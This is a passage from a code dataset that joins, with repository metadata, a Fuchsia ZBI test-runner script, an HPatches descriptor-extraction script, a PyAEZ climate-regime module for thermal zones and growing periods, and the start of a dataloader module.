def __init__(self):
pass | 13.5 | 35 | 0.712963 |
acfb41fbfe95681e90b0720c2afc365a34e55d67 | 4,987 | py | Python | tools/devshell/contrib/run-zbi-test.py | EnderNightLord-ChromeBook/zircon-rpi | b09b1eb3aa7a127c65568229fe10edd251869283 | [
"BSD-2-Clause"
] | 14 | 2020-10-25T05:48:36.000Z | 2021-09-20T02:46:20.000Z | tools/devshell/contrib/run-zbi-test.py | DamieFC/fuchsia | f78a4a1326f4a4bb5834500918756173c01bab4f | [
"BSD-2-Clause"
] | null | null | null | tools/devshell/contrib/run-zbi-test.py | DamieFC/fuchsia | f78a4a1326f4a4bb5834500918756173c01bab4f | [
"BSD-2-Clause"
] | 2 | 2020-10-25T01:13:49.000Z | 2020-10-26T02:32:13.000Z | #!/usr/bin/env python3
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
import platform
import shlex
import subprocess
import sys
def find_bootserver(build_dir):
host_os = {'Linux': 'linux', 'Darwin': 'mac'}[platform.system()]
host_cpu = {'x86_64': 'x64', 'arm64': 'arm64'}[platform.machine()]
with open(os.path.join(build_dir, 'tool_paths.json')) as file:
tool_paths = json.load(file)
bootservers = [
os.path.join(build_dir, tool['path']) for tool in tool_paths if (
tool['name'] == 'bootserver_new' and tool['cpu'] == host_cpu and
tool['os'] == host_os)
]
if bootservers:
return bootservers[0]
print('Cannot find bootserver for %s-%s' % (host_os, host_cpu))
sys.exit(1)
def main():
parser = argparse.ArgumentParser(
prog='fx run-zbi-test', description='Run a ZBI test.')
modes = parser.add_mutually_exclusive_group()
modes.add_argument(
'--boot', '-b', action='store_true', help='Run via bootserver')
modes.add_argument(
'--emu', '-e', action='store_true', help='Run via fx emu')
modes.add_argument(
'--qemu', '-q', action='store_true', help='Run via fx qemu')
parser.add_argument(
'--args',
'-a',
metavar='RUNNER-ARG',
action='append',
default=[],
help='Pass RUNNER-ARG to bootserver/fx emu/fx qemu')
parser.add_argument(
'-k',
action='append_const',
dest='args',
const='-k',
help='Shorthand for --args=-k')
parser.add_argument(
'--cmdline',
'-c',
metavar='KERNEL-ARGS',
action='append',
default=[],
help='Add kernel command-line arguments.')
parser.add_argument(
'name', help='Name of the zbi_test() target to run', nargs='?')
args = parser.parse_args()
build_dir = os.getenv('FUCHSIA_BUILD_DIR')
if build_dir is None:
print('FUCHSIA_BUILD_DIR not set')
return 1
test_cpu = os.getenv('FUCHSIA_ARCH')
if test_cpu is None:
print('FUCHSIA_ARCH not set')
return 1
with open(os.path.join(build_dir, 'zbi_tests.json')) as file:
zbi_tests = json.load(file)
with open(os.path.join(build_dir, 'images.json')) as file:
images = json.load(file)
def qemu_test(test):
label = test['qemu_kernel_label']
for image in images:
if image.get('label') == label:
name = image['name']
if name.startswith('_qemu_phys_test.') and name.endswith(
'.executable'):
name = name[len('_qemu_phys_test.'):-len('.executable')]
return {
'label': label,
'disabled': test['disabled'],
'name': name,
'path': image['path']
}
print('%s missing from images.json' % label)
sys.exit(1)
all_qemu = [
qemu_test(test)
for test in zbi_tests
if test['cpu'] == test_cpu and 'qemu_kernel_label' in test
]
all_zbi = [
test for test in zbi_tests
if test['cpu'] == test_cpu and 'qemu_kernel_label' not in test
]
if not args.name:
print('Available ZBI and QEMU tests:')
for test in all_zbi + all_qemu:
print(
'%s%s from %s' % (
test['name'], ' (disabled)' if test['disabled'] else '',
test['label']))
return 0
zbis = [
os.path.join(build_dir, test['path'])
for test in all_zbi
if test['name'] == args.name
]
qemus = [
os.path.join(build_dir, test['path'])
for test in all_qemu
if test['name'] == args.name
]
if not zbis and not qemus:
print('Cannot find ZBI test %s for %s' % (args.name, test_cpu))
return 1
if len(zbis + qemus) > 1:
print('Multiple matches for %s:' % name)
for path in zbis + qemus:
print(path)
return 1
if args.boot and qemus:
print('Cannot use --boot with QEMU-only test %s' % args.name)
return 1
if args.boot:
bootserver = find_bootserver(build_dir)
cmd = [bootserver, '--boot'] + zbis + args.args
else:
if args.emu:
cmd = ['fx', 'emu', '--headless', '--experiment-arm64']
else:
cmd = ['fx', 'qemu']
cmd += args.args
if zbis:
cmd += ['-z'] + zbis
elif args.emu:
cmd += ['-K'] + qemus
else:
cmd += ['-t'] + qemus
for arg in args.cmdline:
cmd += ['-c', arg]
print('+ %s' % ' '.join(map(shlex.quote, cmd)))
return subprocess.run(cmd).returncode
if __name__ == '__main__':
sys.exit(main())
| 29.508876 | 76 | 0.54602 |
acfb425e2dbfc4e4f7756e17ffc6bd01747f4862 | 1,220 | py | Python | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | import torch
import torchvision
import sys
import os
import cv2
import numpy
assert len(sys.argv)==6, "* python extract.py <net definition> <net params> <patch size> <HPatches folder> <output folder>"
#
MODELFILE = sys.argv[1]
exec(open(MODELFILE).read())
MODEL = init()
MODEL.load_state_dict( torch.load(sys.argv[2]) )
MODEL.cuda()
MODEL.eval()
patchsize = int(sys.argv[3])
#
if not os.path.exists(sys.argv[5]):
os.makedirs(sys.argv[5])
#
for root, dirs, files in os.walk(sys.argv[4]):
#
for f in files:
if f.endswith('.png'):
#
seq = root.split('/')[-1]
#
patches = cv2.imread(os.path.join(root, f))
npatches = int(patches.shape[0]/65)
patches = cv2.resize(patches, (patchsize, patchsize*npatches))
patches = torch.from_numpy(patches).view(npatches, patchsize, patchsize, 3).permute(0, 3, 1, 2).cuda().float()
#torchvision.utils.save_image(patches[400], 'tmp.png')
#
descriptors = MODEL.forward(torch.autograd.Variable(patches, volatile=True)).data.cpu().numpy()
#
if not os.path.exists(os.path.join(sys.argv[5], seq)):
os.makedirs(os.path.join(sys.argv[5], seq))
numpy.savetxt(os.path.join(sys.argv[5], seq, f.split('.')[0]+'.csv'), descriptors, delimiter=',')
| 28.372093 | 123 | 0.67541 |
acfb43747a117199bff696d3d79199523cd4eaf4 | 23,410 | py | Python | code/ClimateRegime.py | slibby/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 17 | 2020-09-10T16:10:59.000Z | 2022-03-28T13:35:53.000Z | code/ClimateRegime.py | sbaber1/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 1 | 2021-07-25T14:21:08.000Z | 2021-08-04T15:59:18.000Z | code/ClimateRegime.py | sbaber1/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 22 | 2020-09-10T16:10:39.000Z | 2022-03-21T04:00:16.000Z | """
PyAEZ
Written by N. Lakmal Deshapriya and Thaileng Thol
"""
import numpy as np
np.seterr(divide='ignore', invalid='ignore') # ignore "divide by zero" or "divide by NaN" warning
import UtilitiesCalc
import ETOCalc
class ClimateRegime(object):
# set mask of study area, this is optional
def setStudyAreaMask(self, admin_mask, no_data_value):
self.im_mask = admin_mask
self.nodata_val = no_data_value
self.set_mask = True
def setLocationTerrainData(self, lat_min, lat_max, elevation):
self.elevation = elevation
self.im_height = elevation.shape[0]
self.im_width = elevation.shape[1]
self.latitude = UtilitiesCalc.UtilitiesCalc().generateLatitudeMap(lat_min, lat_max, self.im_height, self.im_width)
def setMonthlyClimateData(self, min_temp, max_temp, precipitation, short_rad, wind_speed, rel_humidity):
self.meanT_daily = np.zeros((self.im_height, self.im_width, 365))
self.totalPrec_daily = np.zeros((self.im_height, self.im_width, 365))
self.pet_daily = np.zeros((self.im_height, self.im_width, 365))
# Interpolate monthly to daily data
obj_utilities = UtilitiesCalc.UtilitiesCalc()
meanT_monthly = (min_temp+max_temp)/2
for i_row in range(self.im_height):
for i_col in range(self.im_width):
if self.set_mask:
if self.im_mask[i_row, i_col] == self.nodata_val:
continue
self.meanT_daily[i_row, i_col, :] = obj_utilities.interpMonthlyToDaily(meanT_monthly[i_row, i_col,:], 1, 365)
self.totalPrec_daily[i_row, i_col, :] = obj_utilities.interpMonthlyToDaily(precipitation[i_row, i_col,:], 1, 365, no_minus_values=True)
minT_daily = obj_utilities.interpMonthlyToDaily(min_temp[i_row, i_col,:], 1, 365)
maxT_daily = obj_utilities.interpMonthlyToDaily(max_temp[i_row, i_col,:], 1, 365)
radiation_daily = obj_utilities.interpMonthlyToDaily(short_rad[i_row, i_col,:], 1, 365, no_minus_values=True)
wind_daily = obj_utilities.interpMonthlyToDaily(wind_speed[i_row, i_col,:], 1, 365, no_minus_values=True)
rel_humidity_daily = obj_utilities.interpMonthlyToDaily(rel_humidity[i_row, i_col,:], 1, 365, no_minus_values=True)
# calculation of ET
obj_eto = ETOCalc.ETOCalc(1, 365, self.latitude[i_row, i_col], self.elevation[i_row, i_col])
shortrad_daily_MJm2day = (radiation_daily*3600*24)/1000000 # convert w/m2 to MJ/m2/day
obj_eto.setClimateData(minT_daily, maxT_daily, wind_daily, shortrad_daily_MJm2day, rel_humidity_daily)
self.pet_daily[i_row, i_col, :] = obj_eto.calculateETO()
# sea level temperature
self.meanT_daily_sealevel = self.meanT_daily + np.tile(np.reshape(self.elevation/100*0.55, (self.im_height,self.im_width,1)), (1,1,365))
# P over PET ratio
self.P_by_PET_daily = self.totalPrec_daily / self.pet_daily
def setDailyClimateData(self, min_temp, max_temp, precipitation, short_rad, wind_speed, rel_humidity):
self.meanT_daily = np.zeros((self.im_height, self.im_width, 365))
self.totalPrec_daily = np.zeros((self.im_height, self.im_width, 365))
self.pet_daily = np.zeros((self.im_height, self.im_width, 365))
# calculation of ET
for i_row in range(self.im_height):
for i_col in range(self.im_width):
if self.set_mask:
if self.im_mask[i_row, i_col] == self.nodata_val:
continue
self.meanT_daily[i_row, i_col, :] = (min_temp[i_row, i_col, :]+max_temp[i_row, i_col, :])/2
self.totalPrec_daily[i_row, i_col, :] = precipitation[i_row, i_col, :]
obj_eto = ETOCalc.ETOCalc(1, 365, self.latitude[i_row, i_col], self.elevation[i_row, i_col])
shortrad_daily_MJm2day = (short_rad[i_row, i_col, :]*3600*24)/1000000 # convert w/m2 to MJ/m2/day
obj_eto.setClimateData(min_temp[i_row, i_col, :], max_temp[i_row, i_col, :], wind_speed[i_row, i_col, :], shortrad_daily_MJm2day, rel_humidity[i_row, i_col, :])
self.pet_daily[i_row, i_col, :] = obj_eto.calculateETO()
# sea level temperature
self.meanT_daily_sealevel = self.meanT_daily + np.tile(np.reshape(self.elevation/100*0.55, (self.im_height,self.im_width,1)), (1,1,365))
# P over PET ratio
self.P_by_PET_daily = self.totalPrec_daily / self.pet_daily
def getThermalClimate(self):
thermal_climate = np.zeros((self.im_height, self.im_width))
for i_r in range(self.im_height):
for i_c in range(self.im_width):
if self.set_mask:
if self.im_mask[i_r, i_c] == self.nodata_val:
continue
# converting daily to monthly
obj_utilities = UtilitiesCalc.UtilitiesCalc()
meanT_monthly_sealevel_v = obj_utilities.averageDailyToMonthly(self.meanT_daily_sealevel[i_r,i_c,:])
meanT_monthly_v = obj_utilities.averageDailyToMonthly(self.meanT_daily[i_r,i_c,:])
P_by_PET_monthly_v = obj_utilities.averageDailyToMonthly(self.P_by_PET_daily[i_r,i_c,:])
if np.min(meanT_monthly_sealevel_v) >= 18:
# Tropics
#if np.mean(meanT_monthly_v) > 20:
if np.min(meanT_monthly_v) > 20:
# Tropical lowland
thermal_climate[i_r,i_c] = 1
else:
# Tropical highland
thermal_climate[i_r,i_c] = 2
elif np.min(meanT_monthly_sealevel_v) >= 5 and np.sum(meanT_monthly_sealevel_v>=10) >= 8:
# SubTropic
if np.sum(self.totalPrec_daily[i_r,i_c,:]) < 250:
# 'Subtropics Low Rainfall
thermal_climate[i_r,i_c] = 3
elif self.latitude[i_r,i_c]>=0 and np.mean(P_by_PET_monthly_v[3:9]) >= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
# Subtropics Summer Rainfall
thermal_climate[i_r,i_c] = 4
elif self.latitude[i_r,i_c]<0 and np.mean(P_by_PET_monthly_v[3:9]) <= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
# Subtropics Summer Rainfall
thermal_climate[i_r,i_c] = 4
elif self.latitude[i_r,i_c]>=0 and np.mean(P_by_PET_monthly_v[3:9]) <= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
# Subtropics Winter Rainfall
thermal_climate[i_r,i_c] = 5
elif self.latitude[i_r,i_c]<0 and np.mean(P_by_PET_monthly_v[3:9]) >= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
# Subtropics Winter Rainfall
thermal_climate[i_r,i_c] = 5
elif np.sum(meanT_monthly_sealevel_v>=10) >= 4:
# Temperate
if np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 20:
# Oceanic Temperate
thermal_climate[i_r,i_c] = 6
elif np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 35:
# Sub-Continental Temperate
thermal_climate[i_r,i_c] = 7
else:
# Continental Temperate
thermal_climate[i_r,i_c] = 8
elif np.sum(meanT_monthly_sealevel_v>=10) >= 1:
# Boreal
if np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 20:
# Oceanic Boreal
thermal_climate[i_r,i_c] = 9
elif np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 35:
# Sub-Continental Boreal
thermal_climate[i_r,i_c] = 10
else:
# Continental Boreal
thermal_climate[i_r,i_c] = 11
else:
# Arctic
thermal_climate[i_r,i_c] = 12
return thermal_climate
def getThermalZone(self):
thermal_zone = np.zeros((self.im_height, self.im_width))
for i_r in range(self.im_height):
for i_c in range(self.im_width):
if self.set_mask:
if self.im_mask[i_r, i_c] == self.nodata_val:
continue
# converting daily to monthly
obj_utilities = UtilitiesCalc.UtilitiesCalc()
meanT_monthly_sealevel_v = obj_utilities.averageDailyToMonthly(self.meanT_daily_sealevel[i_r,i_c,:])
meanT_monthly_v = obj_utilities.averageDailyToMonthly(self.meanT_daily[i_r,i_c,:])
if np.min(meanT_monthly_sealevel_v) >= 18:
# Tropics
if np.mean(meanT_monthly_v) > 20:
# Warm
thermal_zone[i_r,i_c] = 1
elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
# Moderately Cool
thermal_zone[i_r,i_c] = 2
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
# Cool
thermal_zone[i_r,i_c] = 3
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
# Cold
thermal_zone[i_r,i_c] = 4
elif np.sum(meanT_monthly_v<10) == 12:
# Very Cold
thermal_zone[i_r,i_c] = 5
elif np.min(meanT_monthly_sealevel_v) >= 5 and np.sum(meanT_monthly_sealevel_v>=10) >= 8:
# SubTropic
if np.mean(meanT_monthly_v) > 20:
# Warm
thermal_zone[i_r,i_c] = 6
elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
# Moderately Cool
thermal_zone[i_r,i_c] = 7
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
# Cool
thermal_zone[i_r,i_c] = 8
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
# Cold
thermal_zone[i_r,i_c] = 9
elif np.sum(meanT_monthly_v<10) == 12:
# Very Cold
thermal_zone[i_r,i_c] = 10
elif np.sum(meanT_monthly_sealevel_v>=10) >= 4:
# Temperate
if np.mean(meanT_monthly_v) > 20:
# Warm
thermal_zone[i_r,i_c] = 11
elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
# Moderately Cool
thermal_zone[i_r,i_c] = 12
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
# Cool
thermal_zone[i_r,i_c] = 13
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
# Cold
thermal_zone[i_r,i_c] = 14
elif np.sum(meanT_monthly_v<10) == 12:
# Very Cold
thermal_zone[i_r,i_c] = 15
elif np.sum(meanT_monthly_sealevel_v>=10) >= 1:
# Boreal
if np.mean(meanT_monthly_v) > 20:
# Warm
thermal_zone[i_r,i_c] = 16
elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
# Moderately Cool
thermal_zone[i_r,i_c] = 17
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
# Cool
thermal_zone[i_r,i_c] = 18
elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
# Cold
thermal_zone[i_r,i_c] = 19
elif np.sum(meanT_monthly_v<10) == 12:
# Very Cold
thermal_zone[i_r,i_c] = 20
else:
# Arctic
thermal_zone[i_r,i_c] = 21
return thermal_zone
def getThermalLGP0(self):
return np.sum(self.meanT_daily>0, axis=2)
def getThermalLGP5(self):
return np.sum(self.meanT_daily>5, axis=2)
def getThermalLGP10(self):
return np.sum(self.meanT_daily>10, axis=2)
def getTemperatureSum0(self):
tempT = self.meanT_daily
tempT[tempT<=0] = 0
return np.sum(tempT, axis=2)
def getTemperatureSum5(self):
tempT = self.meanT_daily
tempT[tempT<=5] = 0
return np.sum(tempT, axis=2)
def getTemperatureSum10(self):
tempT = self.meanT_daily
tempT[tempT<=10] = 0
return np.sum(tempT, axis=2)
def getTemperatureProfile(self):
meanT_daily_add1day = np.concatenate((self.meanT_daily, self.meanT_daily[:,:,0:1]), axis=-1)
meanT_first = meanT_daily_add1day[:,:,:-1]
meanT_diff = meanT_daily_add1day[:,:,1:] - meanT_daily_add1day[:,:,:-1]
A9 = np.sum( np.logical_and(meanT_diff>0, meanT_first<-5), axis=2 )
A8 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=-5, meanT_first<0)), axis=2 )
A7 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=0, meanT_first<5)), axis=2 )
A6 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=5, meanT_first<10)), axis=2 )
A5 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=10, meanT_first<15)), axis=2 )
A4 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=15, meanT_first<20)), axis=2 )
A3 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=20, meanT_first<25)), axis=2 )
A2 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=25, meanT_first<30)), axis=2 )
A1 = np.sum( np.logical_and(meanT_diff>0, meanT_first>=30), axis=2 )
B9 = np.sum( np.logical_and(meanT_diff<0, meanT_first<-5), axis=2 )
B8 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=-5, meanT_first<0)), axis=2 )
B7 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=0, meanT_first<5)), axis=2 )
B6 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=5, meanT_first<10)), axis=2 )
B5 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=10, meanT_first<15)), axis=2 )
B4 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=15, meanT_first<20)), axis=2 )
B3 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=20, meanT_first<25)), axis=2 )
B2 = np.sum( np.logical_and(meanT_diff<0, np.logical_and(meanT_first>=25, meanT_first<30)), axis=2 )
B1 = np.sum( np.logical_and(meanT_diff<0, meanT_first>=30), axis=2 )
return [A9,A8,A7,A6,A5,A4,A3,A2,A1,B1,B2,B3,B4,B5,B6,B7,B8,B9]
def getLGP(self, Sa = 100, pc = 0.5, kc = 1, D = 1):
# Sa: available soil moisture holding capacity (mm/m) , usually assume as 100
# kc: crop water requirements for entire growth cycle
# D: rooting depth (m)
# pc: soil water depletion fraction below which ETa < ETo (from literature)
petc = np.zeros(self.pet_daily.shape)
peta = np.zeros(self.pet_daily.shape)
petc = self.pet_daily * 1
for i_r in range(self.im_height):
for i_c in range(self.im_width):
if self.set_mask:
if self.im_mask[i_r, i_c] == self.nodata_val:
continue
if len(np.array(Sa).shape) == 2:
Sa_temp = Sa[i_r, i_c]
else:
Sa_temp = Sa
W = 0
for ii in range(self.pet_daily.shape[-1]):
if self.totalPrec_daily[i_r,i_c,ii] >= petc[i_r,i_c,ii]:
peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
elif self.totalPrec_daily[i_r,i_c,ii] + W >= Sa_temp*D*(1-pc):
peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
else:
kk = (W+self.totalPrec_daily[i_r,i_c,ii]) / (Sa_temp*D*(1-pc))
peta[i_r,i_c,ii] = kk * petc[i_r,i_c,ii]
W = np.min([W+self.totalPrec_daily[i_r,i_c,ii]-peta[i_r,i_c,ii], Sa_temp*D])
if W<0: W=0
return np.sum( (peta/self.pet_daily)>0.5, axis=2 )
def getLGP_G_5_and_10(self):
kc = 1 # crop water requirements for entire growth cycle
Sa = 100 # available soil moisture holding capacity (mm/m) , usually assume as 100
D = 1 # rooting depth (m)
pc = 0.5 # soil water depletion fraction below which ETa < ETo (from literature)
petc = np.zeros(self.pet_daily.shape)
peta = np.zeros(self.pet_daily.shape)
petc = self.pet_daily * 1
for i_r in range(self.im_height):
for i_c in range(self.im_width):
if self.set_mask:
if self.im_mask[i_r, i_c] == self.nodata_val:
continue
W = 0
for ii in range(self.pet_daily.shape[-1]):
if self.totalPrec_daily[i_r,i_c,ii] >= petc[i_r,i_c,ii]:
peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
elif self.totalPrec_daily[i_r,i_c,ii] + W >= Sa*D*(1-pc):
peta[i_r,i_c,ii] = petc[i_r,i_c,ii]
else:
kk = (W+self.totalPrec_daily[i_r,i_c,ii]) / (Sa*D*(1-pc))
peta[i_r,i_c,ii] = kk * petc[i_r,i_c,ii]
W = np.min([W+self.totalPrec_daily[i_r,i_c,ii]-peta[i_r,i_c,ii], Sa*D])
if W<0: W=0
tempT = self.meanT_daily
tempT[np.logical_and(tempT<5, (peta/self.pet_daily)<=0.5)] = 0
ts_g_t5 = np.sum(tempT, axis=2)
tempT = self.meanT_daily
tempT[np.logical_and(tempT<10, (peta/self.pet_daily)<=0.5)] = 0
ts_g_t10 = np.sum(tempT, axis=2)
return [ts_g_t5, ts_g_t10]
def getLGPClassified(self, lgp):
lgp_class = np.zeros(lgp.shape)
lgp_class[lgp>=365] = 7 # Per-humid
lgp_class[np.logical_and(lgp>=270, lgp<365)] = 6 # Humid
lgp_class[np.logical_and(lgp>=180, lgp<270)] = 5 # Sub-humid
lgp_class[np.logical_and(lgp>=120, lgp<180)] = 4 # Moist semi-arid
lgp_class[np.logical_and(lgp>=60, lgp<120)] = 3 # Dry semi-arid
lgp_class[np.logical_and(lgp>0, lgp<60)] = 2 # Arid
lgp_class[lgp<=0] = 1 # Hyper-arid
return lgp_class
def getLGPEquivalent(self):
moisture_index = np.sum(self.totalPrec_daily, axis=2)/np.sum(self.pet_daily, axis=2)
lgp_equv = 14.0 + 293.66*moisture_index - 61.25*moisture_index*moisture_index
lgp_equv[ moisture_index > 2.4 ] = 366
return lgp_equv
def getMultiCroppingZones(self, t_climate, lgp, lgp_t5, lgp_t10, ts_t0, ts_t10):
ts_g_t5_and_10 = self.getLGP_G_5_and_10()
ts_g_t5 = ts_g_t5_and_10[0]
ts_g_t10 = ts_g_t5_and_10[1]
multi_cropping = np.zeros(lgp.shape)
zone_B = np.all([lgp>=45, lgp_t5>=120, lgp_t10>=90, ts_t0>=1600, ts_t10>=1200], axis=0)
zone_C1 = np.all([lgp>=220, lgp_t5>=220, lgp_t10>=120, ts_t0>=5500, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
#zone_C2 = np.all([lgp>=200, lgp_t5>=210, lgp_t10>=120, ts_t0>=6400, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
zone_C3 = np.all([lgp>=180, lgp_t5>=200, lgp_t10>=120, ts_t0>=7200, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
zone_D1 = np.all([lgp>=270, lgp_t5>=270, lgp_t10>=165, ts_t0>=5500, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
#zone_D2 = np.all([lgp>=240, lgp_t5>=240, lgp_t10>=165, ts_t0>=6400, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
zone_D3 = np.all([lgp>=210, lgp_t5>=240, lgp_t10>=165, ts_t0>=7200, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
zone_F = np.all([lgp>=300, lgp_t5>=300, lgp_t10>=240, ts_t0>=7200, ts_t10>=7000, ts_g_t5>=5100, ts_g_t10>=4800], axis=0)
zone_H = np.all([lgp>=360, lgp_t5>=360, lgp_t10>=330, ts_t0>=7200, ts_t10>=7000], axis=0)
multi_cropping[np.all([zone_B,t_climate<=2], axis=0)] = 2
multi_cropping[np.all([zone_C1,t_climate==1], axis=0)] = 3
multi_cropping[np.all([zone_C3,t_climate==2], axis=0)] = 3
multi_cropping[np.all([zone_D1,t_climate==1], axis=0)] = 4
multi_cropping[np.all([zone_D3,t_climate==2], axis=0)] = 4
multi_cropping[np.all([zone_F,t_climate<=2], axis=0)] = 6
multi_cropping[np.all([zone_H,t_climate<=2], axis=0)] = 8
zone_B = np.all([lgp>=45, lgp_t5>=120, lgp_t10>=90, ts_t0>=1600, ts_t10>=1200], axis=0)
zone_C = np.all([lgp>=180, lgp_t5>=200, lgp_t10>=120, ts_t0>=3600, ts_t10>=3000, ts_g_t5>=3200, ts_g_t10>=2700], axis=0)
zone_D = np.all([lgp>=210, lgp_t5>=240, lgp_t10>=165, ts_t0>=4500, ts_t10>=3600, ts_g_t5>=4000, ts_g_t10>=3200], axis=0)
zone_E = np.all([lgp>=240, lgp_t5>=270, lgp_t10>=180, ts_t0>=4800, ts_t10>=4500, ts_g_t5>=4300, ts_g_t10>=4000], axis=0)
zone_F = np.all([lgp>=300, lgp_t5>=300, lgp_t10>=240, ts_t0>=5400, ts_t10>=5100, ts_g_t5>=5100, ts_g_t10>=4800], axis=0)
zone_G = np.all([lgp>=330, lgp_t5>=330, lgp_t10>=270, ts_t0>=5700, ts_t10>=5500], axis=0)
zone_H = np.all([lgp>=360, lgp_t5>=360, lgp_t10>=330, ts_t0>=7200, ts_t10>=7000], axis=0)
multi_cropping[np.all([zone_B,t_climate>=3,t_climate<=8], axis=0)] = 2
multi_cropping[np.all([zone_C,t_climate>=3,t_climate<=8], axis=0)] = 3
multi_cropping[np.all([zone_D,t_climate>=3,t_climate<=8], axis=0)] = 4
multi_cropping[np.all([zone_E,t_climate>=3,t_climate<=8], axis=0)] = 5
multi_cropping[np.all([zone_F,t_climate>=3,t_climate<=8], axis=0)] = 6
multi_cropping[np.all([zone_G,t_climate>=3,t_climate<=8], axis=0)] = 7
multi_cropping[np.all([zone_H,t_climate>=3,t_climate<=8], axis=0)] = 8
return multi_cropping
| 50.780911 | 177 | 0.559334 |
acfb43dfb3dc6ef74eabdbdfe48a723aa37410b3 | 17,042 | py | Python | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 165 | 2021-09-08T07:25:00.000Z | 2022-03-30T15:49:42.000Z | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 12 | 2021-10-14T13:37:43.000Z | 2022-03-25T05:08:48.000Z | dataloading/dataloading.py | tranphong1991/unisurf | 8e4755c7526a8e7a964a59d1cc307976b1ba6d78 | [
"MIT"
] | 10 | 2021-10-21T02:36:46.000Z | 2022-03-30T08:06:15.000Z | import os
import glob
import random
import logging
import torch
from torch.utils import data
from PIL import Image
import numpy as np
import yaml
from torchvision import transforms
from multiprocessing import Manager
logger = logging.getLogger(__name__)
## Adapted from DVR
def get_dataloader(cfg, mode='train', spilt_model_for_images=True,
shuffle=True, with_mask=False):
''' Return dataloader instance
Instansiate dataset class and dataloader and
return dataloader
Args:
cfg (dict): imported config for dataloading
mode (str): whether dta laoding is used for train or test
spilt_model_for_images (bool): as name
shuffle (bool): as name
with_mask (bool): as name
'''
dataset_folder = cfg['dataloading']['path']
categories = cfg['dataloading']['classes']
cache_fields = cfg['dataloading']['cache_fields']
n_views = cfg['dataloading']['n_views']
batch_size = cfg['dataloading']['batchsize']
n_workers = cfg['dataloading']['n_workers']
return_idx = False
split = mode
## get fields
fields = get_data_fields(cfg, mode, with_mask=with_mask)
if return_idx:
fields['idx'] = data.IndexField()
## get dataset
manager = Manager()
shared_dict = manager.dict()
dataset = Shapes3dDataset(
dataset_folder, fields, split=split,
categories=categories,
shared_dict=shared_dict,
n_views=n_views, cache_fields=cache_fields,
split_model_for_images=spilt_model_for_images)
## dataloader
dataloader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, num_workers=n_workers,
shuffle=shuffle, collate_fn=collate_remove_none,
)
return dataloader
def get_data_fields(cfg, mode='train', with_mask=False):
''' Returns the data fields.
Args:
cfg (dict): imported yaml config
mode (str): the mode which is used
Return:
